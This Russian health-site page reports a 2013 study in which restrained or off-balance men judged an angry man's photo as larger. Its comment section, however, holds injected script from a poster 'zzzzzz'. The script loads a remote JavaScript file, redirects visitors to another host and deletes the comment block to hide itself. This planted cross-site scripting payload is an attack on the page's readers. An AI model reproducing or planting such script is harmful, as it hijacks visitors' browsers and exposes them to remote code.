Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  У страха глаза велики! Но...  >>  У страха глаза велики! Новое исследование показало, что злые люди кажутся больше
 
Обратная связь
 

У страха глаза велики! Новое исследование показало, что злые люди кажутся больше

Размер шрифта
11 октября 2013 00:00
Юрий Малышев
Здоровье инфо
Анна Белевская
Здоровье инфо
  • google_analytics: false
  • Нравится

Американские ученые обнаружили, что при физическом насилии жертва недооценивает свои возможности и переоценивает возможности обидчика.

У страха глаза велики! Новое исследование показало, что злые люди кажутся больше

Суть первого эксперимента заключалась в том, что мужчинам показывали фотографию разъяренного мужчины сначала в тот момент, когда они были привязаны к стулу, а затем – в отсутствие физического насилия. Оказалось, что в первом случае мужчина на фотографии казался больше, чем он есть на самом деле. Во время второго эксперимента участникам было предложено оценить свой рост по визуальным меткам на стене. Те участники, которые были привязаны к стулу, значительно недооценивали свой рост.

Для того чтобы исключить эффект тревоги, ученые провели еще один эксперимент, во время которого мужчин не привязывали к стулу, но они стояли на качающейся доске. Участникам, которым не удавалось устоять на доске, казалось, что мужчина на фотографии более высокий и мускулистый.

«Похоже, что при визуальной оценке своих физических возможностей мужчины автоматически рассматривают возможность конфликта», – поясняет один из авторов исследования Дэниэл Фесслер. Поскольку в данном исследовании приняли участие только молодые мужчины, ученые предлагают провести дополнительные исследования с более разнообразным составом участников и другими эмоциями на фотографиях, помимо гнева.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 19:00

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

2 - zzzzzz

30 июня 2015 в 22:58

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Почему вам кажется, что начальник злой?   Спасите мужа от просмотра футбола   Действительно ли, смех – лучшее лекарство?! Можно ли мультиками вылечить болезнь?   Ученые советуют материться!  
01 ноября 2013ИНВИТРО – «Марка №1» в России 21 октября 2013ИНВИТРО открыла центр лучевой диагностики «ИНВИТРО.Эксперт»
 
11 октября 2013Елена Малышева расскажет все о том, как правильно худеть 03 октября 2013Результаты благотворительного марафона «Всем миром»
 

Слайдшоу

1
Грусть или смертельная болезнь
Странные сигналы вашего организма
Как снова хотеть секса

Тесты

1
Будет ли у вас инфаркт?
Кофеин вызывает зависимость?
Как устроены волосы человека?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.